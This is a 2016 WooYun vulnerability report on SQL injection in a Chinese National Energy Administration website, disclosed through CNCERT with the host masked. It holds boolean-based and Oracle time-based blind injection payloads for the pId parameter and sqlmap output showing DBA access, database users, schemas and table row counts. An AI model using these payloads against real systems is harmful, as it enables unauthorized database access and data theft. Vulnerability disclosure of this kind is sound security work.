当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0191989

漏洞标题:国家能源局某站存在SQL注入(DBA权限/涉及51个数据库/大量数据信息泄漏)

相关厂商:cncert国家互联网应急中心

漏洞作者: 路人甲

提交时间:2016-04-03 12:30

修复时间:2016-05-21 11:50

公开时间:2016-05-21 11:50

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-04-03: 细节已通知厂商并且等待厂商处理中
2016-04-06: 厂商已经确认,细节仅向厂商公开
2016-04-16: 细节向核心白帽子及相关领域专家公开
2016-04-26: 细节向普通白帽子公开
2016-05-06: 细节向实习白帽子公开
2016-05-21: 细节向公众公开

简要描述:

看数据库,应该是有大量的数据会被泄漏,就不一一列出来了!~~~
首页?

详细说明:

出处:

http://**.**.**.**/action/front/indexAction_prepareIndex


在“特色专栏”处有一个网站,存在漏洞
注入点:

http://**.**.**.**/SEMIS_DL/page/DoorPage/substance.aspx?action=aff&pId=1365176182

pid存在注入

sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: pId
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: action=aff&pId=1365176182' AND 9212=9212 AND 'LouG'='LouG
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: action=aff&pId=1365176182' AND 6182=DBMS_PIPE.RECEIVE_MESSAGE(CHR(1
09)||CHR(68)||CHR(73)||CHR(98),5) AND 'EKXG'='EKXG
---
[20:11:58] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: Oracle
[20:11:58] [INFO] fetching current user
[20:11:58] [INFO] retrieving the length of query output
[20:11:58] [INFO] retrieved:
sqlmap got a 302 redirect to 'http://**.**.**.**:80/SEMIS_DL/page/ie
aa/commonpage/error.aspx'. Do you want to follow? [Y/n] y
[20:12:01] [WARNING] reflective value(s) found and filtering out
11
[20:12:25] [INFO] retrieved: SS_M__HZJGJ 8/11 (73%)
[20:12:29] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[20:12:29] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[20:12:29] [WARNING] if the problem persists please try to lower the number of u
sed threads (option '--threads')
[20:12:33] [INFO] retrieved: SS_MS_HZJGJ 9/11 (82%)
[20:12:34] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[20:12:36] [INFO] retrieved: SSTMS_HZJGJ
current user:    'SSTMS_HZJGJ'
[20:12:36] [INFO] fetching current database
[20:12:36] [INFO] retrieving the length of query output
[20:12:36] [INFO] resumed: 11
[20:12:36] [INFO] resumed: SSTMS_HZJGJ
[20:12:36] [WARNING] on Oracle you'll need to use schema names for enumeration a
s the counterpart to database names on other DBMSes
current schema (equivalent to database on Oracle):    'SSTMS_HZJGJ'
[20:12:36] [INFO] testing if current user is DBA
current user is DBA:    True
database management system users [58]:
[*] AGSMS
[*] ANONYMOUS
[*] BI
[*] CTXSYS
[*] DBSNMP
[*] DIP
[*] DMSYS
[*] DTSXSMS
[*] DTSXSMS_IEAA5
[*] EDUPRJ_GDSL
[*] EXFSYS
[*] EXMA_DL
[*] EXMA_SL
[*] HR
[*] IX
[*] MDDATA
[*] MDSYS
[*] MGMT_VIEW
[*] OE
[*] OLAPSYS
[*] ORDPLUGINS
[*] ORDSYS
[*] OUTLN
[*] PM
[*] SCOTT
[*] SEMIS_SL
[*] SEMIS_SLS
[*] SH
[*] SI_INFORMTN_SCHEMA
[*] SSTMS_COMMON
[*] SSTMS_DL
[*] SSTMS_DTBC
[*] SSTMS_DTBJ
[*] SSTMS_GDFJ
[*] SSTMS_HB
[*] SSTMS_HDAH
[*] SSTMS_HDFJ
[*] SSTMS_HDFJ_TEST
[*] SSTMS_HDXY
[*] SSTMS_HZJGJ
[*] SSTMS_JZ
[*] SSTMS_LCJ
[*] SSTMS_SL
[*] SSTMS_SN
[*] SSTMS_SXDD
[*] SSTMS_TEST
[*] SSTMS_ZA
[*] SSTMS_ZDTC_TEST
[*] SSTMS_ZDTHN
[*] SSTMS_ZDTSC
[*] SSTMS_ZT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TEST
[*] TSMSYS
[*] WMSYS
[*] XDB
available databases [51]:
[*] AGSMS
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] DTSXSMS
[*] DTSXSMS_IEAA5
[*] EDUPRJ_GDSL
[*] EXFSYS
[*] EXMA_DL		
[*] EXMA_SL		
[*] HR
[*] IX
[*] MDSYS
[*] OE
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] PM
[*] SCOTT
[*] SEMIS_SL
[*] SEMIS_SLS
[*] SH
[*] SSTMS_COMMON
[*] SSTMS_DL		
[*] SSTMS_DTBC		
[*] SSTMS_DTBJ		
[*] SSTMS_GDFJ
[*] SSTMS_HB		
[*] SSTMS_HDAH		
[*] SSTMS_HDFJ
[*] SSTMS_HDFJ_TEST
[*] SSTMS_HDXY
[*] SSTMS_HZJGJ
[*] SSTMS_JZ
[*] SSTMS_LCJ
[*] SSTMS_SL
[*] SSTMS_SN
[*] SSTMS_SXDD
[*] SSTMS_TEST
[*] SSTMS_ZA
[*] SSTMS_ZDTC_TEST
[*] SSTMS_ZDTHN
[*] SSTMS_ZDTSC
[*] SSTMS_ZT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TEST
[*] TSMSYS
[*] WMSYS
[*] XDB
Database: SSTMS_HZJGJ
+-------------------------+---------+
| Table                   | Entries |
+-------------------------+---------+
| EDUTBTESTMANAGER        | 107075  |
| EDUTBWRONGRECORD        | 50694   |
| EDUTBUSERSUBJOINDETAIL  | 21406   |
| EDUTBGRASP              | 11357   |
| EDUTBLESSONMAINTREE     | 7264    |
| EDUTBGRADEMANAGE        | 4248    |
| STATBCULTBDEPART        | 3255    |
| QUESTIONRECORD          | 2297    |
| SETBATTENDANCE          | 1768    |
| EDUTBCURRICULUM         | 1356    |
| SETBHISTORYRECORD       | 1021    |
| SYSAMTBPARTY            | 898     |
| EDUTBUSERSUBJOIN        | 819     |
| SYSAMTBPARTY_ROLE       | 732     |
| SYSAMTBUSER             | 729     |
| SYSSMTBCUSTOMIZE        | 675     |
| SYSAMTBUSER_STATION     | 589     |
| SYSSMPASSWORDHISTORY    | 587     |
| EDUTBTRAINUSERINFO      | 567     |
| EDUTBAPPLYUSERINFO      | 558     |
| SEAPPLYUSERINFO         | 550     |
| SEEXAMUSERINFO          | 549     |
| EDUTBTRAINPROJECTDETAIL | 494     |
| EDUTBGAMES              | 427     |
| SYSFMTBATTACHMENT       | 389     |
| SYSTBTABLEINFO          | 363     |
| SECERTIFICATE           | 251     |
| SYSAMTBRESOURCE         | 241     |
| EDUTBEXAMCURR           | 204     |
| SYSAMTBDEPART           | 164     |
| SEBUSINESSUSER          | 143     |
| SYSTBHINTINFO           | 111     |
| SYSSMTBCONTROLINFO      | 105     |
| EDUTBCURRTRAIN          | 84      |
| SETHINGPROMPT           | 71      |
| SYSAMTBMODULE           | 71      |
| EDUTBCURRICULUMNOTE     | 63      |
| SYSTBCODECONTENT        | 60      |
| SYSSMTBCODECONTENT      | 57      |
| EDUTBEXAMPOLICY         | 30      |
| SYSAMTBROLE_RESOURCE    | 28      |
| SYSSMTBPARAMETER        | 27      |
| EDUTBJOBTYPE            | 26      |
| EDUTBTRAINPROJECT       | 25      |
| SYSSMTBINTERMESSAGE     | 22      |
| EDUTBTEACHERLIB         | 21      |
| EDUTBEXAMAPPLY          | 18      |
| EDUTBWARRANT            | 18      |
| SYSSMTBAFFICHE          | 18      |
| SEFOREGROUNDMODEL       | 17      |
| EDUTBEXAMMANAGE         | 16      |
| SEAPPLYTRAINPJC         | 15      |
| SESTARAPPLY             | 15      |
| SEEXAMPLACE             | 14      |
| EDUTBTRAINPROJECTAPPLY  | 13      |
| SEEXAMPC                | 13      |
| EDUTBSTENCIL            | 11      |
| SYSSMTBCODEKIND         | 11      |
| SYSAMTBSTATION          | 10      |
| EDUTBBUILDPAPERPOLICY   | 9       |
| SEMACHINE               | 9       |
| EDUTBTRAINAGENCY        | 7       |
| SYSTBDOCTYPE            | 7       |
| EDUTBCURRSORT           | 6       |
| SYSAMTBPARTYROLE        | 6       |
| SETRAINACCEPT           | 4       |
| SYSTBCODEKIND           | 4       |
| SEEXAMTEACHER           | 3       |
| EDUTBSORT               | 2       |
| SEMODELACHIE            | 1       |
| SYSAMTBACTIVEUSER       | 1       |
+-------------------------+---------+


太慢了,就不继续了!~~~证明即可

1.jpg


2.jpg


3.jpg


4.jpg


漏洞证明:

如上

修复方案:

过滤修复,设置权限

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2016-04-06 11:46

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT向能源行业信息化主管部门通报,由其后续协调网站管理单位处置.

最新状态:

暂无